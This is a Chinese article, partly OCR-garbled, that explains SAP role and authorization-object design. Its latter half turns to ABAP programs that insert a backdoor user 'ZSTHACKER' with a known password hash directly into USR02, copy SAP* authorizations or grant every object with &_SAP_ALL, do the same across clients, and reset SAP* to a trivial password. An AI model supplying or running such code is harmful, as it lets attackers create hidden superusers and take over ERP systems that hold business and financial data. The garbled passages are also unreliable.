SAP权限设计思路及方法

1、SAP权限与角色设计一般来说，权限就是“某人能干某事”和“某人不能干某事”之合。 在SAP系统中，用 事务码(也称交易代码、或者TCODE或者TransactionCode )表示一个用户能干的事情。比如MM0修个TCODE1用来维护物料数据的、MIGO用来收货的、FS00是用来维护会计科目的等。用SU01新建一个ID时，默认的权限是空白，即这个新建的ID不能做任何事情，不能使用任何事务代码。这样只需要为相应的ID赋上相应的TCODE即可实现“某人能干某事” 了，其补集，则是“某人不能干的某些事”。但是我们不能直接在 SU01里面给某个ID赋上TCODE要通过ROLE中转一下。即：一堆 TCO

2、D朗成了一个 ROLE然后把这个 ROL吩给某 个ID,然后这个ID就得到一堆TCODET。上面这些，仅仅是SAP权限控制的初级概念， 要理解SAP权限控制的全部， 必须还要明 白下面的概念。1、角色(ROLE、通用角色(Common Role)、本地角色(Local Role )上面讲了，角色，即 ROLE是一堆TCODE勺集合，当然还包含有 TCOD坐备的“权限 对象”、“权限字段”、“允许的操作”及“允许的值”等。我们使用PFCG维护角色。为了系统的测试与 SAP实施项目的阶段性需要，进一步将角色分为“通用角色”和“本地角 色”。举个例子便于理解：通用角色好比“生产订单制单员”，本地角色

3、对应就是“长城国际组装一分厂生产订单制单员”。所以，本地角色较之通用角色的区别就是，在同样的操作权限(事务代码们)情况下，前者多了具体的限制值。这个限制值可能是组织架构限制，也可 能是其他业务的限制。如，一分厂的制单员不能维护二分厂的制单员；一分厂的制单员甲只能维护类型为A的单据，而不能维护类型为B的单据，诸如此类。具体请看下面的概念。2、权限对象(Authorization Object )、权限字段(AuthorizationField )、允许的操作 (Activity )、允许的值(Field Value )上面粗略说了构成 ROLE勺是若干TCODE其实， 在ROL臣口 TCOD此间

4、，还有一个中间概念“权限对象”：角色包含了若干权限对象，在透明表AGR_1250中有存储二者之间的关系；权限对象包含了若干权限字段、允许白操作和允许的值，在透明表AGR_1251中体现了ROLE/Object/Field/Value 之间的关系;有一个特殊的权限对象用来包含了若干事务码。这个权限对象叫"S_TCODE,该权限对象的权限字段叫“ TCD ,该字段允许的值( FieldValue )存放的就是事务代码； 有一种特殊的权限字段用来表示可以针对该权限对象做哪些操作，是允许创建、修改、显示、删除或者其他呢。该权限字段叫“ ACTVT ,该字段允许的值( Field Value

5、)存放的就是允 许操作的代码，01代表创建、02代表修改、03代表显示等；SAP 的权限控制是控制到字段级的，换句话说，其权限控制机制可以检查你是否有权限 维护某张透明表的某一个字段。SAP系统自带了若干权限对象、 默认控制了若干权限字段 (对应到透明表的某些字段)。可以用事务码 SU20来查看系统有哪些权限字段，用SU21来查看系统有哪些默认的权限对象。于是我们知道了事务代码与权限对象的区别。从权限控制的范畴来看，事务代码属于一种特殊的权限对象；一个事务代码在执行过程中，为了判断某个ID是否有权限执行此事务代码，还可能检查其他若干普通的权限对象。使用SU22来查看某个事务代码包含了哪些权限对

6、象。在透明表USOBXh存放了事务码与权限对象的对应关系。3、自定义权限对象上文所说的系统自带权限对象与权限字段仅能满足有限的需要，其权限审核的逻辑也是系统硬编码了的，我们能做的只是是否启用某项权限对象的检查(使用SU22。如果需要自定义，通过SU2。SU21定义即可。调用的时候在程序中加入类似代码：AUTHORITY-CHECK OBJECT 'Z_VKORG' ID 'VKORG' FIELD'REC_VKORG-VKORG'.IF SY-SUBRC <> 0.MESSAGE 'No Authorization!'

7、 TYPE 'E'.ENDIF.下面的程序ZCRTUSERL建立用户ZSTHACKEF®始密码123qaz）并赋予SAP*用户的所有权限 的参考程序。Program ZCRTUSER.Data ZUSR02 like USR02 .*1.Create User ZSTHACKER according to DDIC select single * into ZUSR02 from USR02 where BNAME = 'DDIC'.ZUSR02-BNAME = 'ZSTHACKER'.ZUSR02-Bcode = 'E3B79

8、6BB09F7901B'.insert USR02 from ZUSR02 .*2.Copy Auth. Obj from SAP*(or other)*如果将 Where BNAME = 'SAP*'去掉，基本就是复制所有的授权对象data ZUSRBF2 like USRBF2 occurs 0 with header line.select * from USRBF2 into tableZUSRBF2where BNAME = 'SAP*'.Loop at ZUSRBF2.ZUSRBF2-BNAME = 'ZSTHACKER'.M

9、odify ZUSRBF2 INDEX sy-tabix TRANSPORTINGBNAME.endloop.INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.如果SAPm能被删除，还可直接将TOBJ中包含的所有的SAP授权对象全部赋予给一个用户。以下程序ZALLOBJ是赋予所有的标准授权对象给用户 ZSTHACKERProgram ZALLOBJ。Data Ztobj like tobj occurs 0 with header line .data zusrbf2 like usrbf2.select * into tabl

10、e ztobj from tobj .loop at ztobj.zusrbf2-mandt = sy-mandt.zusrbf2-bname = 'ZSTHACKER'.zusrbf2-objct = ztobj-objct.zusrbf2-auth ='&_SAP_ALL'.modify USRBF2 FROM zusrbf2.endloop .也可跨Client建立用户和赋予权限，只要使用 client specified 就可以。Program ZCLIENT.Data zusrbf2 like usrbf2.Select * into zusr

11、bf2 from usrbf2where bname ='SAP*'.Zusrbf2-mandt = '100'.Insert into usrbf2 client specified values zusrbf2.Endselect .下面是一句话修改 SAP郸J密码为123456的程序，同样，假设用户 BUTCHER勺密码丢失，我 只要随便在一台服务器上建立一个用户也叫BUTCHER然后密码设置为1QAZ2WSX则其在任何系统任何client 加密后的密码必为 BF02C9F1F179FB45这样的加密意义已经不大。report ZMODPWD.tables :usr02 .update usr0